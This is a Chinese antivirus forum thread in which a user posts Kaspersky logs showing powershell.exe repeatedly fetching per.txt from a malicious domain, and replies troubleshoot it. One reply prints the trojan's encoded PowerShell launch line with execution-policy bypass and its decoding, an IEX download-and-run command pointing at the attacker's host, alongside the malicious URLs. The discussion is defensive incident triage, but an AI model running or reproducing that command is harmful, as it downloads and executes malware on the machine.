查看: 4688|回复: 19
收起左侧

[可疑文件] 卡巴斯基网页反病毒疯狂拦截powershell访问恶意地址

[复制链接]
暗影皇帝
发表于 2022-4-15 23:50:48 | 显示全部楼层 |阅读模式
本帖最后由 暗影皇帝 于 2022-4-16 01:46 编辑

系统为Windows 11 专业版,卡巴斯基版本为KIS21.2.10.391i首次监测到时间为4月10日,一直到13日未察觉到异常,直到14日因为下载了PJ版扫描器使用,遂发现360安全卫士有报警。然后就看卡巴的报告,发现这玩意已经疯狂了好几天了。14日用卡巴全盘扫描两三次还有拦截,用360系统急救箱全盘强力扫描完之后卡巴还是有拦截.....一直到15日早上改了hosts文件才消停--------------hosts指向是没有问题,只是15日把拦截的那个地址指向了127.0.0.1
网页反病毒拦截下载的日志:


具体日志内容:
  1. 事件: 下载被拒绝
  2. 用户: NT AUTHORITY\SYSTEM
  3. 用户类型: 系统用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
  6. 组件: 网页反病毒
  7. 结果说明: 已阻止
  8. 类型: 木马
  9. 名称: Trojan.PowerShell.Agent.rw
  10. 精确度: 确切
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: per.txt
  14. 对象路径: <span style="background-color: yellowgreen;">hxxp://win.yearidper.com</span>
  15. MD5: F972136743F1C8491CA09C668C2C99A9
  16. 原因: 数据库
  17. 数据库发布日期: 2022/4/9 21:30:00
复制代码
网页反病毒检测到恶意对象以及访问被拒绝的日志:


具体日志内容:
  1. 事件: 检测到恶意对象
  2. 用户: NT AUTHORITY\SYSTEM
  3. 用户类型: 系统用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
  6. 组件: 网页反病毒
  7. 结果说明: 检测到
  8. 类型: 木马
  9. 名称: Trojan.PowerShell.Agent.rw
  10. 精确度: 确切
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: per.txt
  14. 对象路径: <span style="background-color: yellowgreen;">hxxp://win.yearidper.com</span>
  15. MD5: F972136743F1C8491CA09C668C2C99A9
  16. 原因: 数据库
  17. 数据库发布日期: 2022/4/9 21:30:00
复制代码
  1. 事件: 访问被拒绝
  2. 用户: ASUS\Administrator
  3. 用户类型: 活动用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
  6. 组件: 网页反病毒
  7. 结果说明: 已阻止
  8. 类型: 恶意链接
  9. 名称: http://win.yearidper.com/per.txt
  10. 精确度: 确切
  11. 威胁级别: 高
  12. 对象类型: 网页
  13. 对象名称: per.txt
  14. 对象路径: <span style="background-color: yellowgreen;">hxxp://win.yearidper.com</span>
  15. 原因: 数据库
  16. 数据库发布日期: 2022/4/10 9:22:00
复制代码
同时AMSI保护也有相关日志记录:

具体日志内容:
  1. 事件: 对象扫描结果已发送至第三方应用程序
  2. 用户: ASUS\Administrator
  3. 用户类型: 活动用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
  6. 组件: AMSI 保护
  7. 结果说明: 未处理
  8. 类型: 木马
  9. 名称: HEUR:Trojan.PowerShell.Generic
  10. 精确度: 启发式分析
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: amsi_script_utf8
  14. 对象路径: uid://amsi_stream_3//
  15. MD5: AA7F2EF42C4F345869415F68487CC497
  16. 原因: 已记录
复制代码
  1. 事件: 检测到恶意对象
  2. 用户: ASUS\Administrator
  3. 用户类型: 活动用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
  6. 组件: AMSI 保护
  7. 结果说明: 检测到
  8. 类型: 木马
  9. 名称: HEUR:Trojan.PowerShell.Generic
  10. 精确度: 启发式分析
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: amsi_script_utf8
  14. 对象路径: uid://amsi_stream_3//
  15. MD5: AA7F2EF42C4F345869415F68487CC497
  16. 原因: 专家分析
  17. 数据库发布日期: 2022/4/10 16:48:00
复制代码
  1. 事件: 检测到恶意对象
  2. 用户: ASUS\Administrator
  3. 用户类型: 活动用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
  6. 组件: AMSI 保护
  7. 结果说明: 检测到
  8. 类型: 木马
  9. 名称: Trojan.PowerShell.Agent.rw
  10. 精确度: 确切
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: amsi_script_utf8
  14. 对象路径: uid://amsi_stream_1//
  15. MD5: 8EDE93840780B51A18594146309558DE
  16. 原因: 数据库
  17. 数据库发布日期: 2022/4/10 16:48:00
复制代码
  1. 事件: 对象扫描结果已发送至第三方应用程序
  2. 用户: ASUS\Administrator
  3. 用户类型: 活动用户
  4. 应用程序名称: powershell.exe
  5. 应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
  6. 组件: AMSI 保护
  7. 结果说明: 未处理
  8. 类型: 木马
  9. 名称: Trojan.PowerShell.Agent.rw
  10. 精确度: 确切
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: amsi_script_utf8
  14. 对象路径: uid://amsi_stream_1//
  15. MD5: 8EDE93840780B51A18594146309558DE
  16. 原因: 已记录
复制代码
这到底是个神马情况
各位大佬来瞧瞧啊

dyhua
发表于 2022-4-16 00:22:46 | 显示全部楼层
host文件指向有问题?
暗影皇帝
 楼主| 发表于 2022-4-16 01:44:32 | 显示全部楼层
dyhua 发表于 2022-4-16 00:22
host文件指向有问题?

指向没问题,看着一直拦截烦的慌把那个恶意地址指向127.0.0.1了
Jirehlov1234
发表于 2022-4-16 08:34:39 | 显示全部楼层
删除计划任务即可。

试试看
管理员
  1. schtasks /Delete /TN \Microsoft\Windows\dowstwx\Services /F
复制代码


或者直接win+r输入taskschd.msc
找到 \Microsoft\Windows\dowstwx\Services,删除即可
hackerbob
发表于 2022-4-16 09:00:37 | 显示全部楼层
本帖最后由 hackerbob 于 2022-4-16 09:07 编辑

power shell命令运行在内存中,杀软很难检测,而且从版本看,这应该是降级攻击吧,我感觉得先把ps脚本找出来,干脆全盘搜索以ps1为扩展名的文件,都打开看看,有没有Invoke-WebRequest命令
wwwab
发表于 2022-4-16 09:46:46 | 显示全部楼层
火绒论坛之前见过没找到

下载者木马,下载的per.txt是powershell病毒
暗影皇帝
 楼主| 发表于 2022-4-16 11:21:58 | 显示全部楼层
Jirehlov1234 发表于 2022-4-16 08:34
删除计划任务即可。

试试看

在\Microsoft\Windows\路径未发现dowstwx目标
暗影皇帝
 楼主| 发表于 2022-4-16 11:27:35 | 显示全部楼层
hackerbob 发表于 2022-4-16 09:00
power shell命令运行在内存中,杀软很难检测,而且从版本看,这应该是降级攻击吧,我感觉得先把ps脚本找出 ...

我全盘搜索看看
BE_HC
发表于 2022-4-16 12:12:25 | 显示全部楼层
本帖最后由 BE_HC 于 2022-4-16 12:18 编辑


  1. powershell.exe -NoP -NonI -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB5AGUALgB5AGUAYQByAGkAZABwAGUAcgAuAGMAbwBtACcAKQApAA==
复制代码


decode

  1. IEX ((new-object net.webclient).downloadstring('http://ye.yearidper.com'))
复制代码
  1. http://win.yearidper.com/per.txt
复制代码
txt用unicode

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
hackerbob + 3 版区有你更精彩: )

查看全部评分

hackerbob
发表于 2022-4-16 13:34:03 | 显示全部楼层
BE_HC 发表于 2022-4-16 12:12
decode

txt用unicode

网站好像挂了,连不上
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 13:03 , Processed in 0.136266 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表